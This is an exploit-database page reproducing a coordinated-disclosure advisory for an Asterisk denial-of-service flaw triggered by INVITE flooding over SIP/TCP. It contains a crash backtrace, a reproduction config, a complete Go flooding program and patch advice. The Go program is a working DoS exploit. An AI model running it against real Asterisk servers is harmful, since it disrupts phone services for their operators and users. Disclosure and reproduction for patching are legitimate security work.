0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Asterisk 17.6.0 / 17.5.1 Denial Of Service Exploit

Author

Sandro Gauci

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

# Asterisk crash due to INVITE flood over TCP

- Fixed versions: 13.37.1, 16.14.1, 17.8.1, 18.0.1
- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2020-02-asterisk-tcp-invite-crash
- Asterisk Security Advisory: https://downloads.asterisk.org/pub/security/AST-2020-001.html
- Tested vulnerable versions: 17.5.1, 17.6.0
- Timeline:
    - Report date: 2020-08-31
  - Triaged: 2020-09-01
  - Fix provided for testing: 2020-10-29
  - Asterisk release with fix: 2020-11-05
  - Enable Security advisory: 2020-11-06

## Description

When an Asterisk instance is flooded with INVITE messages over TCP, it was observed that after some time Asterisk crashes due to a segmentation fault. The backtrace generated after the crash is:

```
3276        PJ_ASSERT_RETURN((cseq=(pjsip_cseq_hdr*)pjsip_msg_find_hdr(tdata->msg, PJSIP_H_CSEQ, NULL))!=NULL
(gdb) bt
#0  0x00007ffff7df1b80 in pjsip_inv_send_msg (inv=0x7fffc88aa5a8, tdata=0x7fffa706a6d8) at ../src/pjsip-ua/sip_inv.c:3276
#1  0x00007ffff4623c41 in ast_sip_session_send_response (session=0x7fffc88ab9f0, tdata=0x7fffa706a6d8) at res_pjsip_session.c:1917
#2  0x00007ffff4627b6b in new_invite (invite=0x7fff94eccb60) at res_pjsip_session.c:3253
#3  0x00007ffff462815b in handle_new_invite_request (rdata=0x7fffa61ec608) at res_pjsip_session.c:3382
#4  0x00007ffff462833d in session_on_rx_request (rdata=0x7fffa61ec608) at res_pjsip_session.c:3446
#5  0x00007ffff7e190ec in pjsip_endpt_process_rx_data (endpt=0x5555559c9d18, rdata=0x7fffa61ec608, p=0x7ffff47c66a0 <param>, p_handled=0x7fff94eccc6c) at ../src/pjsip/sip_endpoint.c:930
#6  0x00007ffff47922a1 in distribute (data=0x7fffa61ec608) at res_pjsip/pjsip_distributor.c:955
#7  0x000055555574c7e1 in ast_taskprocessor_execute (tps=0x555555bb5a80) at taskprocessor.c:1237
#8  0x0000555555756dc7 in execute_tasks (data=0x555555bb5a80) at threadpool.c:1354
#9  0x000055555574c7e1 in ast_taskprocessor_execute (tps=0x5555559c8040) at taskprocessor.c:1237
#10 0x0000555555754698 in threadpool_execute (pool=0x5555559c6070) at threadpool.c:367
#11 0x000055555575655d in worker_active (worker=0x7fff98003e50) at threadpool.c:1137
#12 0x00005555557562bb in worker_start (arg=0x7fff98003e50) at threadpool.c:1056
#13 0x00005555557604ad in dummy_start (data=0x7fffa41fb6e0) at utils.c:1249
#14 0x00007ffff764e609 in start_thread (arg=<optimized out>) at pthread_create.c:477
#15 0x00007ffff728b103 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
```

## Impact

Abuse of this vulnerability leads to denial of service in Asterisk when SIP over TCP is in use.

## How to reproduce the issue

The following `pjsip.conf` configuration file was used to facilitate the reproduction of this issue:

```
[global]
debug=yes

[transport-tcp]
type = transport
protocol = tcp
bind = 0.0.0.0

[anonymous]
type = endpoint
context = anon
allow = all
```

The following code in Go can be used to reproduce this issue:

```go
package main

import (
  "bytes"
  "flag"
  "fmt"
  "math/rand"
  "net"
  "strconv"
  "strings"
  "time"
)

const charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

func init() {
  rand.Seed(time.Now().UnixNano())
}

func randstr(length int) string {
  b := make([]byte, length)
  for i := range b {
    b[i] = charset[rand.Intn(len(charset))]
  }
  return string(b)
}

type loop struct {
  host   string
  port   int
  conn   net.Conn
  invite []byte
  cseq   int
}

func (l *loop) start() {
  sdp := "v=0\r\n"
  sdp += "o=- 1598350717 1598350717 IN IP4 192.168.1.112\r\n"
  sdp += "s=-\r\n"
  sdp += "c=IN IP4 192.168.1.112\r\n"
  sdp += "t=0 0\r\n"
  sdp += "m=audio 9999 RTP/AVP 0\r\n"
  sdp += "a=rtpmap:0 PCMU/8000/1\r\n"
  sdp += "a=sendrecv\r\n"

  invite := "INVITE sip:5cb49ced@127.0.0.1:5060 SIP/2.0\r\n"
  invite += "Via: SIP/2.0/UDP 192.168.1.112:44896;rport;branch=z9hG4bK-_BRANCH_\r\n"
  invite += "Max-Forwards: 70\r\n"
  invite += "From: <sip:5cb49ced@127.0.0.1:5060>;tag=2k309f\r\n"
  invite += "To: <sip:5cb49ced@127.0.0.1:5060>\r\n"
  invite += "Call-ID: 2345908ux\r\n"
  invite += "CSeq: _CSEQ_ INVITE\r\n"
  invite += "Contact: <sip:5cb49ced@192.168.1.112:44896;transport=udp>\r\n"
  invite += fmt.Sprintf("Content-Length: %d\r\n", len(sdp))
  invite += "Content-Type: application/sdp\r\n"
  invite += "\r\n"
  invite += sdp

  l.invite = []byte(invite)

  var err error
  l.conn, err = net.DialTimeout("tcp4", fmt.Sprintf("%s:%d", l.host, l.port), 5*time.Second)
  if err != nil {
    fmt.Println(err.Error())
    time.Sleep(10 * time.Millisecond)
    go l.start()
    return
  }

  if l.conn != nil {
    l.run()
  } else {
    time.Sleep(10 * time.Millisecond)
    go l.start()
  }
}

func (l *loop) run() {
  if err := l.conn.SetWriteDeadline(time.Now().Add(10 * time.Millisecond)); err != nil {
    if strings.Contains(err.Error(), "use of closed network connection") {
      l.start()
    }

  }

  var err error
  for {
    l.cseq++
    inv := l.invite
    inv = bytes.ReplaceAll(inv, []byte("_BRANCH_"), []byte(randstr(8)))
    inv = bytes.ReplaceAll(inv, []byte("_CSEQ_"), []byte(strconv.Itoa(l.cseq)))

    if _, err = l.conn.Write(inv); err != nil {
      go l.start()
      return
    }
  }
}

func main() {
  var port = flag.Int("p", 5060, "Port")
  var host = flag.String("h", "127.0.0.1", "Host")
  flag.Parse()

  for i := 0; i < 100; i++ {
    go func() {
      l := loop{
        host: *host,
        port: *port,
      }
      l.start()
    }()
  }
  select {}
}
```

## Solution and recommendations

Apply the patch provided by Asterisk or upgrade to a fixed version.

Enable Security would like to thank Kevin Harwell, Joshua C. Colp and the staff at Asterisk for the very quick response and fixing this security issue.

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Asterisk 17.6.0 / 17.5.1 Denial Of Service Exploit

Report Error

Report Error